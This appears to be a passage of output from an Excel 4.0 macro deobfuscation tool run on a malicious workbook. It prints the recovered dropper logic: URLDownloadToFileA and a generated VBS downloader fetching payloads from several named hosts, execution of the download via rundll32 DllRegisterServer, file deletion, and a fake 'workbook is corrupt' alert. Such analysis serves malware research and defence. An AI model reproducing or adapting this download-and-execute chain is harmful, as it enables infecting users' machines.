  275. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  276. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  277. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  278. CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
  279. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  280. CELL:CU38582 , FullEvaluation , [FALSE]
  281. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  282. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  283. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  284. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  285. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  286. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  287. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  288. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  289. CELL:CU38574 , FullEvaluation , [FALSE]
  290. CELL:CU38575 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  291. CELL:CU38576 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  292. CELL:CU38577 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  293. CELL:CU38578 , FullEvaluation , IF(R38576C99<40000,,GOTO(R38589C99))
  294. CELL:CU38579 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  295. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  296. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  297. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  298. CELL:CU38582 , FullEvaluation , [FALSE]
  299. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  300. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  301. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  302. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  303. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  304. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  305. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  306. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  307. CELL:AQ33177 , FullEvaluation , [FALSE] GOTO(R26995C97)
  308. CELL:CS26995 , FullEvaluation , "=""C:\Users\Public\ezNJJrCR.html"""
  309. CELL:CS26996 , FullEvaluation , "=""C:\Users\Public\CiOnQpVy.vbs"""
  310. CELL:CS26997 , FullEvaluation , "=FOPEN(R62431C74,3)"
  311. CELL:CS26998 , FullEvaluation , "=FWRITELN(R62432C74,""M1UW = """"https://wireborg.com/wp-keys.php"""""")"
  312. CELL:CS26999 , FullEvaluation , "=FWRITELN(R62432C74,""U4Uo = """"http://zmedia.shwetech.com/wp-keys.php"""""")"
  313. CELL:CS27000 , FullEvaluation , "=FWRITELN(R62432C74,""pqlyh = """"https://datalibacbi.ml/wp-keys.php"""""")"
  314. CELL:CS27001 , FullEvaluation , "=FWRITELN(R62432C74,""OeDOJy = """"https://procacardenla.ga/wp-keys.php"""""")"
  315. CELL:CS27002 , FullEvaluation , "=FWRITELN(R62432C74,""DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)"")"
  316. CELL:CS27003 , FullEvaluation , "=FWRITELN(R62432C74,""Dim OJxd: Set OJxd = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  317. CELL:CS27004 , FullEvaluation , "=FWRITELN(R62432C74,""Function Uj8Ty(data):"")"
  318. CELL:CS27005 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.setOption(2) = 13056"")"
  319. CELL:CS27006 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.Open """"GET"""", data, False"")"
  320. CELL:CS27007 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  321. CELL:CS27008 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.Send"")"
  322. CELL:CS27009 , FullEvaluation , "=FWRITELN(R62432C74,""Uj8Ty = OJxd.Status"")"
  323. CELL:CS27010 , FullEvaluation , "=FWRITELN(R62432C74,""End Function"")"
  324. CELL:CS27011 , FullEvaluation , "=FWRITELN(R62432C74,""For Each o37s4 in DcH"")"
  325. CELL:CS27012 , FullEvaluation , "=FWRITELN(R62432C74,""If Uj8Ty(o37s4) = 200 Then"")"
  326. CELL:CS27013 , FullEvaluation , "=FWRITELN(R62432C74,""Dim qjDgRsx: Set qjDgRsx = CreateObject(""""ADODB.Stream"""")"")"
  327. CELL:CS27014 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Open"")"
  328. CELL:CS27015 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Type = 1"")"
  329. CELL:CS27016 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Write OJxd.ResponseBody"")"
  330. CELL:CS27017 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.SaveToFile """"""&R62430C74&"""""", 2"")"
  331. CELL:CS27018 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Close"")"
  332. CELL:CS27019 , FullEvaluation , "=FWRITELN(R62432C74,""Exit For"")"
  333. CELL:CS27020 , FullEvaluation , "=FWRITELN(R62432C74,""End If"")"
  334. CELL:CS27021 , FullEvaluation , "=FWRITELN(R62432C74,""Next"")"
  335. CELL:CS27022 , FullEvaluation , "=FCLOSE(R62432C74)"
  336. CELL:CS27023 , FullEvaluation , "=EXEC(""explorer.exe ""&R62431C74&"""")"
  337. CELL:CS27024 , FullEvaluation , "=WHILE(ISERROR(FILES(R62430C74)))"
  338. CELL:CS27025 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  339. CELL:CS27026 , FullEvaluation , "=NEXT()"
  340. CELL:CS27027 , FullEvaluation , "=FILE.DELETE(R62431C74)"
  341. CELL:CS27028 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  342. CELL:CS27029 , FullEvaluation , "=""C:\Users\Public\EgkL.vbs"""
  343. CELL:CS27030 , FullEvaluation , "=FOPEN(R62464C74,3)"
  344. CELL:CS27031 , FullEvaluation , "=""rundll32.exe"""
  345. CELL:CS27032 , FullEvaluation , "=R62430C74&"",DllRegisterServer"""
  346. CELL:CS27033 , FullEvaluation , "=""C:\Windows\System32"""
  347. CELL:CS27034 , FullEvaluation , "=FWRITELN(R62465C74,""Set b7H = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  348. CELL:CS27035 , FullEvaluation , "=FWRITELN(R62465C74,""b7H.Document.Application.ShellExecute """"""&R62466C74&"""""",""""""&R62467C74&"""""",""""""&R62468C74&"""""",Null,0"")"
  349. CELL:CS27036 , FullEvaluation , "=FCLOSE(R62465C74)"
  350. CELL:CS27037 , FullEvaluation , "=EXEC(""explorer.exe ""&R62464C74&"""")"
  351. CELL:CS27038 , FullEvaluation , "=GOTO(R33146C43)"
  352. CELL:CS27039 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________82)
  353. CELL:HH20519 , FullEvaluation , FORMULA("=FORMULA(R[6475]C[-119],R[41910]C[-142])",egaz0Af2DyYfLadkmB$HH$20520:$HH$20563)
  354. CELL:HH20520 , FullEvaluation , FORMULA("=""C:\Users\Public\ezNJJrCR.html""",R[41910]C[-142])
  355. CELL:HH20521 , FullEvaluation , FORMULA("=""C:\Users\Public\CiOnQpVy.vbs""",R[41910]C[-142])
  356. CELL:HH20522 , FullEvaluation , FORMULA("=FOPEN(R62431C74,3)",R[41910]C[-142])
  357. CELL:HH20523 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""M1UW = """"https://wireborg.com/wp-keys.php"""""")",R[41910]C[-142])
  358. CELL:HH20524 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""U4Uo = """"http://zmedia.shwetech.com/wp-keys.php"""""")",R[41910]C[-142])
  359. CELL:HH20525 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""pqlyh = """"https://datalibacbi.ml/wp-keys.php"""""")",R[41910]C[-142])
  360. CELL:HH20526 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OeDOJy = """"https://procacardenla.ga/wp-keys.php"""""")",R[41910]C[-142])
  361. CELL:HH20527 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)"")",R[41910]C[-142])
  362. CELL:HH20528 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Dim OJxd: Set OJxd = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[41910]C[-142])
  363. CELL:HH20529 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Function Uj8Ty(data):"")",R[41910]C[-142])
  364. CELL:HH20530 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.setOption(2) = 13056"")",R[41910]C[-142])
  365. CELL:HH20531 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.Open """"GET"""", data, False"")",R[41910]C[-142])
  366. CELL:HH20532 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[41910]C[-142])
  367. CELL:HH20533 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.Send"")",R[41910]C[-142])
  368. CELL:HH20534 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Uj8Ty = OJxd.Status"")",R[41910]C[-142])
  369. CELL:HH20535 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""End Function"")",R[41910]C[-142])
  370. CELL:HH20536 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""For Each o37s4 in DcH"")",R[41910]C[-142])
  371. CELL:HH20537 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""If Uj8Ty(o37s4) = 200 Then"")",R[41910]C[-142])
  372. CELL:HH20538 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Dim qjDgRsx: Set qjDgRsx = CreateObject(""""ADODB.Stream"""")"")",R[41910]C[-142])
  373. CELL:HH20539 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Open"")",R[41910]C[-142])
  374. CELL:HH20540 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Type = 1"")",R[41910]C[-142])
  375. CELL:HH20541 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Write OJxd.ResponseBody"")",R[41910]C[-142])
  376. CELL:HH20542 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.SaveToFile """"""&R62430C74&"""""", 2"")",R[41910]C[-142])
  377. CELL:HH20543 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Close"")",R[41910]C[-142])
  378. CELL:HH20544 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Exit For"")",R[41910]C[-142])
  379. CELL:HH20545 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""End If"")",R[41910]C[-142])
  380. CELL:HH20546 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Next"")",R[41910]C[-142])
  381. CELL:HH20547 , FullEvaluation , FORMULA("=FCLOSE(R62432C74)",R[41910]C[-142])
  382. CELL:HH20548 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R62431C74&"""")",R[41910]C[-142])
  383. CELL:HH20549 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R62430C74)))",R[41910]C[-142])
  384. CELL:HH20550 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[41910]C[-142])
  385. CELL:HH20551 , FullEvaluation , FORMULA("=NEXT()",R[41910]C[-142])
  386. CELL:HH20552 , FullEvaluation , FORMULA("=FILE.DELETE(R62431C74)",R[41910]C[-142])
  387. CELL:HH20553 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[41910]C[-142])
  388. CELL:HH20554 , FullEvaluation , FORMULA("=""C:\Users\Public\EgkL.vbs""",R[41910]C[-142])
  389. CELL:HH20555 , FullEvaluation , FORMULA("=FOPEN(R62464C74,3)",R[41910]C[-142])
  390. CELL:HH20556 , FullEvaluation , FORMULA("=""rundll32.exe""",R[41910]C[-142])
  391. CELL:HH20557 , FullEvaluation , FORMULA("=R62430C74&"",DllRegisterServer""",R[41910]C[-142])
  392. CELL:HH20558 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[41910]C[-142])
  393. CELL:HH20559 , FullEvaluation , FORMULA("=FWRITELN(R62465C74,""Set b7H = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[41910]C[-142])
  394. CELL:HH20560 , FullEvaluation , FORMULA("=FWRITELN(R62465C74,""b7H.Document.Application.ShellExecute """"""&R62466C74&"""""",""""""&R62467C74&"""""",""""""&R62468C74&"""""",Null,0"")",R[41910]C[-142])
  395. CELL:HH20561 , FullEvaluation , FORMULA("=FCLOSE(R62465C74)",R[41910]C[-142])
  396. CELL:HH20562 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R62464C74&"""")",R[41910]C[-142])
  397. CELL:HH20563 , FullEvaluation , FORMULA("=GOTO(R33146C43)",R[41910]C[-142])
  398. CELL:HH20564 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________83)
  399. CELL:BV62430 , FullEvaluation , "C:\Users\Public\ezNJJrCR.html"
  400. CELL:BV62431 , FullEvaluation , "C:\Users\Public\CiOnQpVy.vbs"
  401. CELL:BV62432 , PartialEvaluation , FOPEN("C:\Users\Public\CiOnQpVy.vbs",3)
  402. CELL:BV62433 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","M1UW = ""https://wireborg.com/wp-keys.php""")
  403. CELL:BV62434 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","U4Uo = ""http://zmedia.shwetech.com/wp-keys.php""")
  404. CELL:BV62435 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","pqlyh = ""https://datalibacbi.ml/wp-keys.php""")
  405. CELL:BV62436 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OeDOJy = ""https://procacardenla.ga/wp-keys.php""")
  406. CELL:BV62437 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)")
  407. CELL:BV62438 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Dim OJxd: Set OJxd = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  408. CELL:BV62439 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Function Uj8Ty(data):")
  409. CELL:BV62440 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.setOption(2) = 13056")
  410. CELL:BV62441 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.Open ""GET"", data, False")
  411. CELL:BV62442 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
  412. CELL:BV62443 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.Send")
  413. CELL:BV62444 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Uj8Ty = OJxd.Status")
  414. CELL:BV62445 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","End Function")
  415. CELL:BV62446 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","For Each o37s4 in DcH")
  416. CELL:BV62447 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","If Uj8Ty(o37s4) = 200 Then")
  417. CELL:BV62448 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Dim qjDgRsx: Set qjDgRsx = CreateObject(""ADODB.Stream"")")
  418. CELL:BV62449 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Open")
  419. CELL:BV62450 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Type = 1")
  420. CELL:BV62451 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Write OJxd.ResponseBody")
  421. CELL:BV62452 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.SaveToFile ""C:\Users\Public\ezNJJrCR.html"", 2")
  422. CELL:BV62453 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Close")
  423. CELL:BV62454 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Exit For")
  424. CELL:BV62455 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","End If")
  425. CELL:BV62456 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Next")
  426. CELL:BV62457 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)")
  427. CELL:BV62458 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\CiOnQpVy.vbs")
  428. CELL:BV62459 , PartialEvaluation , WHILE(ISERROR(FILES(R62430C74)))
  429. CELL:BV62462 , PartialEvaluation , FILE.DELETE("C:\Users\Public\CiOnQpVy.vbs")
  430. CELL:BV62463 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  431. CELL:BV62464 , FullEvaluation , "C:\Users\Public\EgkL.vbs"
  432. CELL:BV62465 , PartialEvaluation , FOPEN("C:\Users\Public\EgkL.vbs",3)
  433. CELL:BV62466 , FullEvaluation , "rundll32.exe"
  434. CELL:BV62467 , FullEvaluation , "C:\Users\Public\ezNJJrCR.html,DllRegisterServer"
  435. CELL:BV62468 , FullEvaluation , "C:\Windows\System32"
  436. CELL:BV62469 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\EgkL.vbs"",3)","Set b7H = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  437. CELL:BV62470 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\EgkL.vbs"",3)","b7H.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\ezNJJrCR.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  438. CELL:BV62471 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\EgkL.vbs"",3)")
  439. CELL:BV62472 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\EgkL.vbs")
  440. CELL:BV62473 , FullEvaluation , GOTO(R33146C43)
  441. CELL:AQ33146 , End , CLOSE(FALSE)
  442. CELL:AQ33156 , FullEvaluation , [FALSE] GOTO(R33146C43)
  443. CELL:AQ33146 , End , CLOSE(FALSE)
  444. [END of Deobfuscation]
  445. time elapsed: 10.969358205795288
  446.  
  447. Process finished with exit code 0